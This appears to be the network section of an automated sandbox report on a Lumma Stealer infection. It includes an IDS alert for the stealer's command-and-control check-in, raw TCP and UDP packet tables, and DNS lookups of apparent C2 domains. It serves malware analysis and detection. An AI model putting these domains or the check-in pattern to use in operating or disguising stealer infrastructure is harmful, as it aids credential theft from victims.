                                                                                                                                                                                                            2025-01-10T11:36:20.313124+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.349811104.21.48.1443TCP

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.692198038 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.692225933 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.692301035 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.697107077 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.697119951 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.352534056 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.352690935 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.361092091 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.361110926 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.361501932 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.407738924 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.421279907 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.463330030 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823328972 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823359966 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823390007 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823409081 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823430061 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823501110 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823501110 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823524952 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.823580980 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.917702913 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.917737007 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.917825937 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.917840958 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.917865992 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.917882919 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.922738075 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.922787905 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.927298069 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.927345037 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.927352905 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.927377939 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.927417994 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943044901 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943064928 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943092108 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943103075 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.101442099 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.101454020 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.101516008 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.111591101 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.111603975 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.567948103 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.568039894 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.570105076 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.570116043 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.570362091 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.571726084 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.571744919 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.571810007 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.005136967 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.005228996 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.005419970 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006002903 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006022930 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006032944 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006038904 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036082983 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036128998 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036441088 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036750078 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036760092 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.518943071 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.519063950 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.520350933 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.520360947 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.520906925 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.522331953 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.522367954 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.522433996 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976216078 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976259947 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976286888 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976326942 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976345062 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976352930 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976372004 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976387024 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976417065 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976577997 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981750011 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981784105 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981811047 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981822014 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981827021 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981862068 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.032758951 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.032788038 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.076967955 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077003956 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077100039 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077128887 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077148914 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077192068 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077219963 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077421904 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077445984 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077460051 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077465057 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.846307993 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.846354961 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.846438885 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.847595930 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.847610950 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.301132917 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.301208019 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.302515984 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.302525997 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.302793980 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.304140091 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.304306030 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.304342985 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719460964 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719691038 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719754934 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719825029 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719842911 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.864541054 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.864573002 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.864655018 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.865036964 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.865048885 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.320235014 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.320338964 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.321656942 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.321666956 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.321926117 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.323189020 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.323298931 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.323333025 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781018019 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781131029 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781235933 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781443119 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781461000 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.990763903 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.990816116 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.990981102 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.991697073 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.991712093 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.483596087 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.483700991 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.485018969 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.485024929 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.485367060 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.486953020 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.487102985 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.487147093 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.487240076 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:16.487248898 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.131791115 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.131911039 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.132122993 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.132186890 CET49788443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.132210970 CET44349788104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.344269991 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.344312906 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.344393015 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.344825983 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.344840050 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.826047897 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.826169968 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.828222990 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.828233957 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.828531981 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.829824924 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.829921007 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:17.829930067 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.252223015 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.252509117 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.252643108 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.252796888 CET49799443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.252816916 CET44349799104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.381783009 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.381825924 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.382263899 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.382263899 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.382299900 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.838473082 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.838629961 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.839940071 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.839956045 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.840176105 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.841492891 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.841691971 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:18.841705084 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.328624010 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.328888893 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.329005003 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.329049110 CET49805443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.329071045 CET44349805104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.355211020 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.355262041 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.355348110 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.355664968 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.355679035 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.840256929 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.840373993 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.841666937 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.841679096 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.842715025 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.843961000 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.843986034 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:19.844124079 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:20.313123941 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:20.313237906 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:20.313319921 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:20.313481092 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:20.313507080 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:20.313513994 CET49811443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:20.313520908 CET44349811104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.149585962 CET5770553192.168.2.3162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.154470921 CET5357705162.159.36.2192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.154623985 CET5770553192.168.2.3162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.159535885 CET5357705162.159.36.2192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.620498896 CET5770553192.168.2.3162.159.36.2
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.625494957 CET5357705162.159.36.2192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.625926971 CET5770553192.168.2.3162.159.36.2

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.495762110 CET5618453192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.576889992 CET53561841.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.581828117 CET5007253192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.591504097 CET53500721.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.594357967 CET5638653192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.603127956 CET53563861.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.605983973 CET6072153192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.617432117 CET53607211.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.620028973 CET5096053192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.628998995 CET53509601.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.630240917 CET6378853192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.640355110 CET53637881.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.644088030 CET6297553192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.652705908 CET53629751.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.658298969 CET5785953192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.667207003 CET53578591.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.669950008 CET5083553192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.678167105 CET53508351.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.680692911 CET5284553192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.687452078 CET53528451.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.085656881 CET6136053192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.096344948 CET53613601.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.148976088 CET5351195162.159.36.2192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.663636923 CET6133453192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.673310041 CET53613341.1.1.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:37.877006054 CET5085153192.168.2.31.1.1.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:37.884334087 CET53508511.1.1.1192.168.2.3

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.495762110 CET192.168.2.31.1.1.10x61fdStandard query (0)enterwahsh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.581828117 CET192.168.2.31.1.1.10x6d26Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.594357967 CET192.168.2.31.1.1.10x62e9Standard query (0)slipperyloo.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.605983973 CET192.168.2.31.1.1.10xc69aStandard query (0)manyrestro.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.620028973 CET192.168.2.31.1.1.10x620bStandard query (0)shapestickyr.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.630240917 CET192.168.2.31.1.1.10x5248Standard query (0)talkynicer.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.644088030 CET192.168.2.31.1.1.10xda33Standard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.658298969 CET192.168.2.31.1.1.10x2eecStandard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.669950008 CET192.168.2.31.1.1.10xbc5cStandard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.680692911 CET192.168.2.31.1.1.10x6844Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.085656881 CET192.168.2.31.1.1.10x5a4Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:36.663636923 CET192.168.2.31.1.1.10x12aeStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:37.877006054 CET192.168.2.31.1.1.10x5cbeStandard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 10, 2025 11:36:03.388149977 CET1.1.1.1192.168.2.30x3a6dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:03.388149977 CET1.1.1.1192.168.2.30x3a6dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.576889992 CET1.1.1.1192.168.2.30x61fdName error (3)enterwahsh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 10, 2025 11:36:09.591504097 CET1.1.1.1192.168.2.30x6d26Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
